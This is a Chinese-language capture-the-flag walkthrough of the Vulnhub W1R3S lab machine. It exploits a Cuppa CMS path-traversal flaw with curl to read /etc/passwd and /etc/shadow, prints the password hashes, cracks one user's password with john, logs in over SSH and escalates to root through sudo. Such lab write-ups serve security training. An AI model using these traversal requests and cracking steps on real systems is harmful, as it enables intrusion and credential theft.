┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.16.129/administrator/alerts/alertConfigField.php<style>.new_content{position: fixed;}.alert_config_field{font-size:12px;background:#FFF;position:relative;border-radius: 3px;box-shadow: 0px 0px 5px rgba(0,0,0,0.2);overflow:hidden;position:fixed;top:50%;left:50%;width:600px;height:440px;margin-left:-300px;margin-top:-220px;}.alert_config_top{position: relative;margin: 2px;margin-bottom: 0px;border: 1px solid #D2D2D2;background: #4489F8;overflow: auto;color:#FFF;font-size: 13px;padding: 7px 5px;box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);}.description_alert{position:relative;font-size:12px;text-shadow:0 1px #FFFFFF;font-weight: normal;padding: 5px 0px 5px 0px;}.btnClose_alert{position:absolute;top: 4px; right: 2px;width:22px;height:22px;cursor:pointer;background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;background-position: center;background-size: 13px;}.content_alert_config{position:relative;clear:both;margin: 2px;margin-top: 0px;height: 401px;padding: 10px;overflow: auto;}</style><script>functionCloseDefaultAlert(){cuppa.setContent({'load':false, duration:0.2});cuppa.blockade({'load':false, duration:0.2, delay:0.1});}</script><div id="alert"><div><strong>Configuration</strong>: <div id="btnClose_alert" onclick="CloseDefaultAlert()"></div></div><div id="content_alert_config">root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologinsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/falsesystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/falsesystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/falsesystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/falsesyslog:x:104:108::/home/syslog:/bin/false_apt:x:105:65534::/nonexistent:/bin/falsemessagebus:x:106:110::/var/run/dbus:/bin/falseuuidd:x:107:111::/run/uuidd:/bin/falselightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/falsewhoopsie:x:109:117::/nonexistent:/bin/falseavahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/falseavahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/falsednsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/falsecolord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/falsespeech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/falsehplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/falsekernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/falsepulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/falsertkit:x:118:126:RealtimeKit,,,:/proc:/bin/falsesaned:x:119:127::/var/lib/saned:/bin/falseusbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/falsew1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bashsshd:x:121:65534::/var/run/sshd:/usr/sbin/nologinftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/falsemysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false</div></div>既然passwd文件可以读取,那我们试一下可不可以读取shadow文件,也是成功读取了┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ curl --data-urlencode 'urlConfig=../../../../../../../../../etc/shadow' http://192.168.16.129/administrator/alerts/alertConfigField.php<style>.new_content{position: fixed;}.alert_config_field{font-size:12px;background:#FFF;position:relative;border-radius: 3px;box-shadow: 0px 0px 5px rgba(0,0,0,0.2);overflow:hidden;position:fixed;top:50%;left:50%;width:600px;height:440px;margin-left:-300px;margin-top:-220px;}.alert_config_top{position: relative;margin: 2px;margin-bottom: 0px;border: 1px solid #D2D2D2;background: #4489F8;overflow: auto;color:#FFF;font-size: 13px;padding: 7px 5px;box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);}.description_alert{position:relative;font-size:12px;text-shadow:0 1px #FFFFFF;font-weight: normal;padding: 5px 0px 5px 0px;}.btnClose_alert{position:absolute;top: 4px; right: 2px;width:22px;height:22px;cursor:pointer;background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;background-position: center;background-size: 13px;}.content_alert_config{position:relative;clear:both;margin: 2px;margin-top: 0px;height: 401px;padding: 10px;overflow: auto;}</style><script>functionCloseDefaultAlert(){cuppa.setContent({'load':false, duration:0.2});cuppa.blockade({'load':false, duration:0.2, delay:0.1});}</script><div id="alert"><div><strong>Configuration</strong>: <div id="btnClose_alert" onclick="CloseDefaultAlert()"></div></div><div id="content_alert_config">root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::daemon::17379:0:99999:7:::bin::17379:0:99999:7:::sys::17379:0:99999:7:::sync::17379:0:99999:7:::games::17379:0:99999:7:::man::17379:0:99999:7:::lp::17379:0:99999:7:::mail::17379:0:99999:7:::news::17379:0:99999:7:::uucp::17379:0:99999:7:::proxy::17379:0:99999:7:::www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::backup::17379:0:99999:7:::list::17379:0:99999:7:::irc::17379:0:99999:7:::gnats::17379:0:99999:7:::nobody::17379:0:99999:7:::systemd-timesync::17379:0:99999:7:::systemd-network::17379:0:99999:7:::systemd-resolve::17379:0:99999:7:::systemd-bus-proxy::17379:0:99999:7:::syslog::17379:0:99999:7:::_apt::17379:0:99999:7:::messagebus::17379:0:99999:7:::uuidd::17379:0:99999:7:::lightdm::17379:0:99999:7:::whoopsie::17379:0:99999:7:::avahi-autoipd::17379:0:99999:7:::avahi::17379:0:99999:7:::dnsmasq::17379:0:99999:7:::colord::17379:0:99999:7:::speech-dispatcher:!:17379:0:99999:7:::hplip::17379:0:99999:7:::kernoops::17379:0:99999:7:::pulse::17379:0:99999:7:::rtkit::17379:0:99999:7:::saned::17379:0:99999:7:::usbmux::17379:0:99999:7:::w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::sshd::17554:0:99999:7:::ftp::17554:0:99999:7:::mysql:!:17554:0:99999:7:::</div></div>
存储在shadow.hash文件中,然后用john破解,只爆破出了www-data和w1r3s两个用户的密码,root的密码先让john继续爆吧
| 用户 | 密码 |
|---|---|
|
|
|
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo john shadow.hashWarning: detected hashtype"sha512crypt", but the string is also recognized as "HMAC-SHA256"Use the "--format=HMAC-SHA256" option to force loading these as that type insteadUsing default input encoding: UTF-8Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])Cost 1 (iteration count) is 5000 for all loaded hashesWill run 12 OpenMP threadsProceeding with single, rules:SinglePress 'q' or Ctrl-C to abort, almost any other key for statuswww-data (www-data)Almost done: Processing the remaining buffered candidate passwords, if any.Proceeding with wordlist:/usr/share/john/password.lstcomputer (w1r3s)Proceeding with incremental:ASCII使用w1r3s进行ssh登录,成功登录,获取立足点┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo ssh [email protected]The authenticity of host '192.168.16.129 (192.168.16.129)' can't be established.ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.16.129' (ED25519) to the list of known hosts.----------------------Think this is the way?----------------------Well,........possibly.----------------------[email protected]'s password:Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)Documentation: https://help.ubuntu.comManagement: https://landscape.canonical.com* Support: https://ubuntu.com/advantage108 packages can be updated.6 updates are security updates......You made it huh?....Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35w1r3s@W1R3S:~$ whoamiw1r3s四、权限提升root的密码爆了两年半也没爆出来,不爆了,看看当前用户有什么权限,该用户有sudo权限,那再看看有哪些可以执行哪些系统及命令,all所有系统命令都可以执行w1r3s@W1R3S:~$ iduid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)w1r3s@W1R3S:~$ sudo -lsudo: unable to resolve host W1R3S[sudo] password for w1r3s:Matching Defaults entries for w1r3s on W1R3S:env_reset, mail_badpass,secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binUser w1r3s may run the following commands on W1R3S:(ALL : ALL) ALL那这个用户就相当于是root用户了,使用sudo启动一个新的bash会话,也是拿到root权限了w1r3s@W1R3S:~$ sudo /bin/bashsudo: unable to resolve host W1R3Sroot@W1R3S:~# whoamirootroot@W1R3S:~# iduid=0(root) gid=0(root) groups=0(root)root@W1R3S:~# ip a1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope hostvalid_lft forever preferred_lft forever2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000link/ether 00:0c:29:37:f4:3d brd ff:ff:ff:ff:ff:ffinet 192.168.16.129/24 brd 192.168.16.255 scope global dynamic ens33valid_lft 255213sec preferred_lft 255213secinet6 fe80::dfa7:d085:91b:320f/64 scope linkvalid_lft forever preferred_lft forever找一下flag吧root@W1R3S:~# cd /rootroot@W1R3S:/root# lsflag.txtroot@W1R3S:/root# cat flag.txt-----------------------------------------------------------------------------------------____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____/ ___/ _ | | |/ ___| _ / |_ _| | | | | / |_ _|_ _/ _ | | / ___|| | | | | | | | | _| |_) | / _ | | | | | | | / _ | | | | | | | | ___| |__| |_| | | | |_| | _ < / ___ | | | |_| | |___ / ___ | | | | |_| | | |___) |_______/|_| _|____|_| _/_/ __| ___/|_____/_/ __| |______/|_| _|____/-----------------------------------------------------------------------------------------.-----------------TTTT_-----_______/''''''''''(______O] ----------____ ______/]___...---'"""_ --'' Q ___________@|''' ._ _______________=---------"""""""| ..--''| l L |_l || ..--'' . /-___j ' '| ..--'' / , ' '|--'' / `L__' -- '-.'. /'-./----------------------------------------------------------------------------------------YOU HAVE COMPLETED THE__ __ ______________________ _________/ / /_ ______ _____ / _____/// / | || _/ _(__ < _____/ | || | / /__/ / |___||____|_ /______ /_______ /.INC/ / / / CHALLENGE, V 1.0----------------------------------------------------------------------------------------CREATED BY SpecterWires----------------------------------------------------------------------------------------
注:鼎星安全有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
原文始发于微信公众号(鼎新安全):Vulnnhub | W1R3S靶场练习
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论